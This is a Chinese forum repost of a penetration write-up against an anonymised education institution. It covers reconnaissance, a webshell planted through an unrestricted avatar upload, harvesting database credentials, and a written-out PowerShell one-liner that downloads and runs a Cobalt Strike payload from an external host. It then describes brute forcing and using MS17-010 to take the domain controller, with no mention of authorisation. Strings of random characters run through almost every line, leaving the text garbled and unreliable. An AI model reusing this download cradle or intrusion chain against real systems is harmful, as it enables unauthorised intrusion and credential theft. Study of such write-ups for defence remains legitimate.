找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2458|回复: 0
打印 上一主题 下一主题

渗透实战 | 从外网直接打到内网全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2024-3-1 19:41:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

5 @0 r1 Q- n* v 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路 * S: }9 H" ]' z% u) n7 s# M% D, B2 a

# n1 ^, c9 ~3 h# A. v# H

! i. o' m8 V, s) }" ?% X   3 S/ N* f+ z; C% `( I* T

# w, D% s" x5 C

/ h0 ~8 Q* [9 b 正文 4 \3 i# V Y& ~9 \8 l6 N

! ^, j' c/ Q3 }8 V9 t

$ N4 k4 h% {" Q9 s- H2 y! d  ' D* m0 d, w, M! F# a& c# w

* P2 y! ? w" h+ H

# P u; ~ g* ^* E6 T 目标:www.xxxx.com(一家教育机构)
0 e* T% \7 D1 k( Z* @2 D/ ^8 p
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
Y) n1 X# B, ?/ T0 i

0 J" f: _* G& S

~& c2 ]! x& m% [ r @1 p vshapes= ! W4 G E: u w9 D: v, d5 J

7 M3 \! Z9 i1 m3 x9 R+ M4 I

6 x9 ?; Z# D( H 进行了简单的信息搜集
2 N7 n* T: {+ Z9 F0 ]. U3 ~6 j
$ ?! b+ u. C3 c# t! N: H
- o" z2 X( P9 I; W! O: \ v! [; v- C

# g: T1 e9 h; l" s- B

8 I2 \) z* m! ^& A/ Z# u8 \, ?- C 子域名搜集 . A3 I* B9 [0 c% W, e. X8 }7 \; G

$ i* { d! Z1 w" l4 D0 O9 n

; r0 P! K3 l# I: N5 P vshapes=3 d3 T G2 P9 f9 Y, [; T

! @, o0 a' l) F5 y' x* _! @! X* Q: @% ?

. v8 e2 a% L) J: k+ | fofa找资产
. i, W$ B: i3 {6 [$ w/ E
' E+ B$ _ W% R; v& f }- {. l1 Y
+ ^% i" o3 D) T. V k; w9 F" E

1 t' S5 b8 \ ]

) M- H D1 g' E: m* I7 {9 o" o vshapes=: J3 L% H) ]( h( s

; v7 {4 K6 H! y

2 V" [% q/ W9 U& ^1 e 一共七个资产。去重之后只有两个。
5 A; G' A4 w( ^) p' j) ~
# R+ s9 Y" x+ ^: p5 H+ Z. O
. [. e, C7 ]9 [5 _& j" L) ]

0 L1 q% i0 I" ]* A/ ~) s

; ~$ x- s; |) M) G! s 目录探测 8 S8 S; |1 h' Q( D3 e1 M

: M. P* X/ C1 W: Q, \5 R- a1 t! h% Y

$ h* J. T: F# d vshapes= . d8 ^3 \% V1 G

: b, D+ }( d$ n% p; _5 [

, b; o' L g c& n- \ 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
5 S6 e2 z9 g2 p z
' P5 t! v( N& S8 O
! n3 Z8 s" {. L& e

+ Q4 _% I# ^* n7 `2 P

4 T8 R$ N& V0 i+ l 我又尝试了通过修改返回包来绕过登录界面0 Y. R9 y4 x" s ~8 t/ x

" \: q9 X7 c* o4 l$ B

* u5 N+ E5 L5 B$ T9 j! `2 f$ c, a vshapes=0 ~" l' }0 Y: z0 R

# d5 s# z% d, l# L: X

6 G/ W& `5 e; ]* D 还是不行,尝试注入无果 , ~. \" A2 ^, `% g, @3 R6 c8 H

/ [. P# ]4 @& U1 d

" Q: X( n. }- d! m5 I- f8 } vshapes= ; n, F! q% i9 g" U: O$ ~

" A, R/ [8 h) h

& f( V; y6 |/ s0 H 不过我目录探测出了一处Spring信息泄露
. Y; I _7 J! L) z, n3 B! n
. f9 A$ K3 x% T, }
' H! G' a2 @4 `/ X' Z: }

; c7 `5 I: s. ~/ j9 y

* F3 j; m5 i. T$ p vshapes= I( g/ @7 z3 G \

; [. [! k" g, T" E* F$ o7 I! b! ]

- F5 ^1 d: t" b. g* H" i, u3 \ 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录1 C: R" \- w* y# U

$ K9 P5 U& \; P& J' E6 {6 J1 o

* z: V6 |2 P3 N vshapes=1 X0 i, K8 M) e0 i

+ {/ W8 @7 z U& P: w& ^# y

w5 L6 {: }! {6 e 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。; Q( A/ M& V9 P9 V% w# g2 O- n( I

6 t- ?% X. g+ L% i& \4 {+ `

4 {' p7 [. c" @: \ vshapes= & p4 W) H+ [$ L1 i: R+ }

: k: C9 L5 w/ X# G# [- R2 P- s

/ W0 y, p. G% q% Q" q- x3 L 获取有些师傅到这一步就手机抓包电脑测了。3 j8 k) ~7 B+ [0 X

7 o1 c5 @% F( K9 k, l1 W

1 a6 M6 A3 o& v4 U$ p Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。& t% T w: P3 U. L% {4 E- I

2 b3 c. N6 v* m( Y

* c7 R3 E) I7 b3 w! w, [! G8 c6 b 其中在一个公众号发现了小程序,可以进行注册。 # l4 O, o% G, Z, P8 A" x

; ?/ ^ ?9 {! j# J& c" l

+ t' I$ s3 d; N$ _ 看到了头像上传,尝试上传获取WebShell , e$ i% E1 n k+ N' ]

( L! Z. \; b* a& D

9 f6 k! X. u/ D$ k7 j vshapes=8 I9 f- n" j+ y/ o

$ C: N* e4 p1 k, m

& \# O4 m% R" \! h 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问 8 H* g5 s/ W. k6 f9 u, t. m- R

# P7 y/ k0 j0 J! g, p

9 c1 t8 [+ _6 g9 ?$ M! `$ B8 F vshapes=& N# `8 k2 @/ l1 R# u

; {7 u% a. |2 ?; a

; q9 X& g# Y# @ 然后上了大马0 _1 q+ v p0 s i

% c2 \# m+ m3 X1 |# T, r

$ L; S( v/ ]9 }: i1 \) K, K% v7 t vshapes=# K3 j$ A! T3 _+ s3 A/ |$ ^5 ]

/ `; n+ @$ \# H6 o

& }% ~: W' |! n+ a) A) K& ?) h vshapes= ) F) q2 X2 M2 C7 X5 r; y

0 p' j1 ?+ E* [9 [! D* H% V

, P; I1 x/ }5 h8 B: \$ ] 通过翻找文件发现数据库账号密码 s( Z- o5 Z- d! v2 m

1 C! y& |( g; ]# _2 y3 a9 N

1 \# J2 b8 g) r$ s vshapes=$ K2 G! }$ m5 m4 l: c

' i1 P X7 D7 Y* j$ }! a. x; Z0 P

5 t2 `4 ?+ l& O0 L( V1 o1 I6 C --内网渗透8 g# J' _* s! S9 C

! f& u0 e3 P$ Z

' @. N2 Z' u3 u2 L0 W; B 直接通过powershell执行 cs上线" f* o: F. G7 O& z4 |

- A: ]: D7 \: H

4 @3 p3 `7 u. y: A4 J powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))": j q% V+ p2 F/ R

* \3 N- j L. V( N

+ s6 I% @3 S4 [% Y+ H+ q vshapes=/ Q2 r8 ^# t- `5 b4 j1 F

4 N S: K6 O ?" F/ v1 \% ?1 f

& Z. x5 P3 s6 M6 ~" Z- M" s* |/ M! n 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 & @% z# K7 g }$ D

; y3 x* ?1 A/ h2 g" V

1 y: l" ]5 n3 v. B% e: A vshapes=6 D) o& K7 v$ R4 Z

5 F3 o7 T/ r0 `: ], m( ~1 T

1 H5 }$ S; o" A* G! z6 J 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
4 s k* g- e. ^2 s+ F
6 S% \: e0 ]# @2 v
5 f3 |4 f' K$ ~' `# |
% j ~6 b6 N- v: F: @* k

+ Y- z2 w0 f: _* M" ^1 m6 ?

- X8 _" \" k: O- T! B vshapes=6 i1 i" k( J; B, J' i# a

/ o/ N7 `: F T, }. [2 i( F

# t- M: m" z+ W. [- ^- R1 K 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
2 N1 F6 e8 ~& p. T. @
' z; i/ _$ j. m; T K0 R$ z& k
0 `/ X0 b5 p0 o& b

& g0 b+ x; W( q0 l4 E' Y: l1 b" r

( R5 _' H5 d, b! e0 l- f4 d4 N& T vshapes= : y! r% X: [; y# H0 P) U

. `& V. P% d- Y4 H5 \! G% U

, o4 r+ X. W, e0 w- b0 X9 g# l
9 ^1 c) s$ `( T9 o/ f; Q# s! J
0 E% h8 f3 ~' r# V& e; Z! k4 n
" x8 k1 C/ ?1 z- m2 O# W6 H

' s! Z- J( K0 p4 X' ?* U4 e

5 P& x* x3 J. i1 n( D   4 { q8 \8 `( m/ t$ T. ~4 \

4 h( T& ~# _* b) ^

4 g- H4 u8 u2 ]5 R1 n' P 小结 ' Y) l# G# d. V. F

! H+ B0 D3 x) w9 P

- T- ?* {* B: l m  * @( M- P2 U' i

# K5 P1 ]3 G$ H9 {0 n' o

6 Q* H* W0 } i- q9 J 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路! # \; A" _ _0 m" n" |

, {! G( [1 O* {+ k: C9 A. c

1 S0 } Z* ] K6 c; A  3 _1 ~4 w1 k/ Z

. d& a- l& V) \7 ?( O
    - A1 k0 i" {) v6 E, Y7 E
  • 8 L4 a* X% N1 ~) T   " V0 a# g% ]0 D
  • - p5 T# A9 Q: W$ P0 C
  • ' X l7 u5 X- G0 U/ H7 L7 j9 o; f   ) E$ r, [+ w3 r
  • 6 m# x# f' j! Q7 x
$ A% w- z s/ v6 G' S$ R6 @3 F5 Y

/ E2 X0 Y9 N8 I; P1 ~ 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html5 f1 P$ x2 F5 b! g

) z( N! V9 |. D* `/ ]; t

- @8 V# w# M( S0 i* n   6 l$ x( Q4 u3 f" I- _. ^

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表